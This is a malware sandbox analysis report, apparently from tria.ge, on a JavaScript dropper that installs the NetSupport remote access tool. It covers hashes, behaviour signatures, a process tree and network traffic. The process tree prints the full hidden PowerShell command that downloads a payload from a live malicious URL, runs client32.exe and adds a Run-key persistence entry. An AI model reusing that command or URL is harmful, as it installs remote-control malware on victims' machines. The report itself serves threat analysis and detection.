Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
135s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24/10/2024, 13:15 UTC
Static task
static1
Behavioral task
behavioral1
Sample
c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js
Resource
win10v2004-20241007-en
General
-
Target
c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js
-
Size
5.2MB
-
MD5
a495fbc9b99c98d0a054e937d4dcb944
-
SHA1
b2a2433591576985adce5da344d72ae669a9cc5f
-
SHA256
c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e
-
SHA512
67ffdf2a2541127bcd1cf05b8f4c47e99844fb9a01ec33d5ff538e6a176eade5636f20c096e783f5d1c5b849ec2ee952a89a3fc35286d1e0e1000c0a21d39c6a
-
SSDEEP
49152:OCz4F9dM2furCz4F9dM2fuVCz4F9dM2furCz4F9dM2fu+Cz4F9dM2furCz4F9dMW:OkGgkGMkGgkGbkGgkGMkGgkG9
Malware Config
Extracted
https://adullamglobal.com/work/das.php?13401
https://adullamglobal.com/work/das.php?13401
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Blocklisted process makes network request 4 IoCs
flow pid Process 6 4212 wscript.exe 8 4212 wscript.exe 17 4212 wscript.exe 31 5024 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 5024 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 1540 client32.exe -
Loads dropped DLL 6 IoCs
pid Process 1540 client32.exe 1540 client32.exe 1540 client32.exe 1540 client32.exe 1540 client32.exe 1540 client32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PBHHYCWP = "C:\\Users\\Admin\\AppData\\Roaming\\DEXHCUYIT0\\client32.exe" powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5024 powershell.exe 5024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5024 powershell.exe Token: SeSecurityPrivilege 1540 client32.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1540 client32.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 4212 wrote to memory of 5024 4212 wscript.exe 91 PID 4212 wrote to memory of 5024 4212 wscript.exe 91 PID 5024 wrote to memory of 1540 5024 powershell.exe 94 PID 5024 wrote to memory of 1540 5024 powershell.exe 94 PID 5024 wrote to memory of 1540 5024 powershell.exe 94
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $DLNAWOOKD='https://adullamglobal.com/work/das.php?13401';$GHKAXRYCOEK=(New-Object System.Net.WebClient).DownloadString($DLNAWOOKD);$QMAPSLXX=[System.Convert]::FromBase64String($GHKAXRYCOEK);$asd = Get-Random -Minimum -5 -Maximum 12; $EENLMJVX=[System.Environment]::GetFolderPath('ApplicationData')+'\DEXHCUYIT'+$asd;if (!(Test-Path $EENLMJVX -PathType Container)) { New-Item -Path $EENLMJVX -ItemType Directory };$p=Join-Path $EENLMJVX 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$QMAPSLXX);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EENLMJVX)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $EENLMJVX 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $EENLMJVX -Force; $fd.attributes='Hidden';$s=$EENLMJVX+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='PBHHYCWP';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe"C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1540
-
-
Network
-
Remote address:8.8.8.8:53Requestadullamglobal.comIN AResponseadullamglobal.comIN A79.141.162.186
-
Remote address:79.141.162.186:443RequestPOST /work/fix.php?2046 HTTP/1.1
Accept: */*
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: adullamglobal.com
Content-Length: 7
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Description: File Transfer
Content-Disposition: attachment; filename=updates.js
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Length: 2274419
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.ax-0001.ax-msedge.netg-bing-com.ax-0001.ax-msedge.netIN CNAMEax-0001.ax-msedge.netax-0001.ax-msedge.netIN A150.171.27.10ax-0001.ax-msedge.netIN A150.171.28.10
-
Remote address:8.8.8.8:53Requestr11.o.lencr.orgIN AResponser11.o.lencr.orgIN CNAMEo.lencr.edgesuite.neto.lencr.edgesuite.netIN CNAMEa1887.dscq.akamai.neta1887.dscq.akamai.netIN A2.18.190.73a1887.dscq.akamai.netIN A2.18.190.80
-
Remote address:8.8.8.8:53Request97.17.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request61.45.26.184.in-addr.arpaIN PTRResponse61.45.26.184.in-addr.arpaIN PTRa184-26-45-61deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request186.162.141.79.in-addr.arpaIN PTRResponse
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=Remote address:150.171.27.10:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=2F289F00A97362650A708A22A87563F0; domain=.bing.com; expires=Tue, 18-Nov-2025 13:15:28 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 18894B10D9214D3A9C364DB544D487DD Ref B: LON601060108040 Ref C: 2024-10-24T13:15:28Z
date: Thu, 24 Oct 2024 13:15:28 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=Remote address:150.171.27.10:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2F289F00A97362650A708A22A87563F0
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=GFAKUU97AEvftXHfsKm4Diei30ayTi-5xaoCbsXg89k; domain=.bing.com; expires=Tue, 18-Nov-2025 13:15:29 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3E7BB815C5CE4ABE814A8980B10CD154 Ref B: LON601060108040 Ref C: 2024-10-24T13:15:29Z
date: Thu, 24 Oct 2024 13:15:28 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=Remote address:150.171.27.10:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2F289F00A97362650A708A22A87563F0; MSPTC=GFAKUU97AEvftXHfsKm4Diei30ayTi-5xaoCbsXg89k
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DC27CC5E6A3945609D12E6D6CE07ABC8 Ref B: LON601060108040 Ref C: 2024-10-24T13:15:29Z
date: Thu, 24 Oct 2024 13:15:29 GMT
-
GEThttp://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3Dwscript.exeRemote address:2.18.190.73:80RequestGET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r11.o.lencr.org
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "D2C54317F18E11A735A6475A5F6058D8BAE2F323505325378815102EBB763711"
Last-Modified: Wed, 23 Oct 2024 10:58:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=12764
Expires: Thu, 24 Oct 2024 16:48:12 GMT
Date: Thu, 24 Oct 2024 13:15:28 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Request73.190.18.2.in-addr.arpaIN PTRResponse73.190.18.2.in-addr.arpaIN PTRa2-18-190-73deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request10.27.171.150.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request0.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request88.156.103.20.in-addr.arpaIN PTRResponse
-
Remote address:79.141.162.186:443RequestGET /work/das.php?13401 HTTP/1.1
Host: adullamglobal.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestgeo.netsupportsoftware.comIN AResponsegeo.netsupportsoftware.comIN A172.67.68.212geo.netsupportsoftware.comIN A104.26.0.231geo.netsupportsoftware.comIN A104.26.1.231
-
Remote address:172.67.68.212:80RequestGET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; Charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8d7a3c986b0f948d-LHR
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Origin: *
Cache-Control: private
Set-Cookie: ASPSESSIONIDQQCQBADR=IEOBCDPAAFBIPIABLMGHLFAC; path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Accept-Encoding
cf-apo-via: origin,host
Referrer-Policy: strict-origin-when-cross-origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uyhUpNqH9W8t%2FmJnQ6JaeU5eY1ZJm%2BjvfF8KVi4IldniyyManFpQYciBPOgynYcm0YHxGCw8Vzjgv9Stg5yRq6QstsqUcKEuI9BQaWGiaAsxwiJE%2FRdscv%2FSlq4DtMeLe%2BSaTMWga70rGBSb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
-
Remote address:8.8.8.8:53Request143.159.181.5.in-addr.arpaIN PTRResponse143.159.181.5.in-addr.arpaIN PTR5-181-159-143 mivocloudcom
-
Remote address:8.8.8.8:53Request212.68.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request217.106.137.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request212.20.149.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request15.164.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request79.190.18.2.in-addr.arpaIN PTRResponse79.190.18.2.in-addr.arpaIN PTRa2-18-190-79deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request14.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesttse1.mm.bing.netIN AResponsetse1.mm.bing.netIN CNAMEmm-mm.bing.net.trafficmanager.netmm-mm.bing.net.trafficmanager.netIN CNAMEax-0001.ax-msedge.netax-0001.ax-msedge.netIN A150.171.27.10ax-0001.ax-msedge.netIN A150.171.28.10
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.27.10:443RequestGET /th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 493712
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B296B5E3F52C4072A680F582D3682D1C Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
date: Thu, 24 Oct 2024 13:17:09 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.27.10:443RequestGET /th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 619595
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E68ACF3F1B2142DF937229ACA8E15473 Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
date: Thu, 24 Oct 2024 13:17:09 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:150.171.27.10:443RequestGET /th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 522409
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 90C2CA5B5848470FB9CB1140F62BC6CA Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
date: Thu, 24 Oct 2024 13:17:09 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:150.171.27.10:443RequestGET /th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 534196
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FC5405588C85400C92E991F21EA760F4 Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
date: Thu, 24 Oct 2024 13:17:09 GMT
-
81.2kB 2.3MB 1692 1688
HTTP Request
POST https://adullamglobal.com/work/fix.php?2046HTTP Response
200 -
150.171.27.10:443https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=tls, http22.0kB 9.4kB 22 19
HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=HTTP Response
204HTTP Request
GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=HTTP Response
204 -
2.18.190.73:80http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3Dhttpwscript.exe522 B 1.1kB 6 4
HTTP Request
GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3DHTTP Response
200 -
76.5kB 3.1MB 1498 2257
HTTP Request
GET https://adullamglobal.com/work/das.php?13401HTTP Response
200 -
2.0kB 814 B 9 7
-
440 B 1.1kB 7 5
HTTP Request
GET http://geo.netsupportsoftware.com/location/loca.aspHTTP Response
200 -
1.2kB 6.9kB 15 13
-
150.171.27.10:443https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90tls, http280.4kB 2.3MB 1645 1641
HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200 -
1.2kB 6.9kB 15 13
-
1.2kB 6.9kB 15 13
-
63 B 79 B 1 1
DNS Request
adullamglobal.com
DNS Response
79.141.162.186
-
56 B 148 B 1 1
DNS Request
g.bing.com
DNS Response
150.171.27.10150.171.28.10
-
61 B 160 B 1 1
DNS Request
r11.o.lencr.org
DNS Response
2.18.190.732.18.190.80
-
71 B 145 B 1 1
DNS Request
97.17.167.52.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
61.45.26.184.in-addr.arpa
-
73 B 138 B 1 1
DNS Request
186.162.141.79.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
73.190.18.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
10.27.171.150.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
0.159.190.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
88.156.103.20.in-addr.arpa
-
72 B 120 B 1 1
DNS Request
geo.netsupportsoftware.com
DNS Response
172.67.68.212104.26.0.231104.26.1.231
-
72 B 113 B 1 1
DNS Request
143.159.181.5.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
212.68.67.172.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
217.106.137.52.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
212.20.149.52.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
15.164.165.52.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
79.190.18.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
14.227.111.52.in-addr.arpa
-
62 B 170 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
150.171.27.10150.171.28.10
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
320KB
MD5c94005d2dcd2a54e40510344e0bb9435
SHA155b4a1620c5d0113811242c20bd9870a1e31d542
SHA2563c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA5122e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
195B
MD5e9609072de9c29dc1963be208948ba44
SHA103bbe27d0d1ba651ff43363587d3d6d2e170060f
SHA256dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747
SHA512f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0
-
Filesize
18KB
MD5104b30fef04433a2d2fd1d5f99f179fe
SHA1ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA5125efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f
-
Filesize
3.6MB
MD5d3d39180e85700f72aaae25e40c125ff
